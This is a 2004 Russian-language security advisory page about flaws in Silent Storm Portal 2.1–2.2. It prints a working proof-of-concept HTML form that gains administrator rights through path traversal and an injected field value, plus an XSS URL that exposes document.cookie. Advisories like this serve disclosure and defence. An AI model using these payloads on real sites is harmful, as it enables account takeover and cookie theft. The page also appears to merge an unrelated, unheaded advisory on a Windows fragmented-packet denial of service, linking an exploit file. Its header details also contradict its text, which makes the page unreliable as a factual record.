Security Lab

Несколько уязвимостей в Silent Storm Portal

Дата публикации:03.10.2004
Всего просмотров:1053
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2004-1566
CVE-2004-1567
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Silent Storm Portal 2.x
Уязвимые версии: Silent Storm Portal 2.1-2.2

Описание: Несколько уязвимостей обнаружено в Silent Storm Portal. Удаленный пользователь может получить административные привилегии на целевом приложении. Удаленный пользователь может также выполнить XSS нападение.

Создание новой учетной записи с административными привилегиями:

<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
XSS
http://[target]/index.php?module=%3Cscript%20language=javascript%3Ewindow.a lert%28document.cookie%29;%3C/script%3E

URL производителя: http://www.silent-storm.co.uk/ssp/index.php?module=../../Home

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Программа: Windows 2000/XP

Опасность: Низкая

Наличие эксплоита: Да

Описание: Несколько вариантов некоторых известных уязвимостей в Windows могут эксплуатироваться удаленным пользователем, чтобы вызвать отказ в обслуживании.

Ошибка обнаружена в обработке фрагментированных пакетов. Удаленный пользователь может послать большое число небольших фрагментированных пакетов, в которых пропущены некоторые пакеты и затем постоянно посылать последний фрагмент, чтобы заставить уязвимую систему использовать 100 CPU и перестать обрабатывать легитимные фрагментированные пакеты.

Пример/Эксплоит: http://digital.net/~gandalf/rose.c

URL производителя: http://www.Microsoft.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple Vulnerabilities in Silent Storm Portal